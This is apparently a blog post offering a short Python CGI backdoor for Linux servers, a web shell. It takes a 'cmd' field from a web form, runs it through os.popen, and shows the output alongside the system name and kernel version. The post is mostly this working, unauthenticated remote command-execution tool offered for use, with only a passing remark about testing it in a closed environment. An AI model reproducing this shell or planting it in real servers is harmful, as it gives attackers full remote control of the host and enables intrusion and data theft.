CGI Backdoor for Linux with Python

#!/usr/bin/env python
# Info  : Linux based CGI backdoor with python
# author: otoy
# date  : 0x102010
 
import cgi,os,re,sys
 
form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)
 
dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]
 
osinf = os.uname()
info='''====================================
       CGI python backdoor
====================================
Author : otoy
Date   : 0x102010
Blog   : <a href="https://otoyrood.wordpress.com" target="_blak">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])
 
print "Content-type: text/html"
print
 
print"""
<html>
  <head>
    <title>CGI python backdoor</title>
  </head>
  <body>
    <pre>%s</pre>
    <form action='%s'>
       Command <input type='text' name='cmd' />
    <input type='submit' />
    </form>
    <pre>%s</pre>
  </body>
</html>
""" %(info,progfl,osexe.read())

in action :

PS: if you wanna try this code in your closed environment, you can read this link or this one, it will show you how to run CGI module on your apache server.

Leave a Reply

Your email address will not be published. Required fields are marked *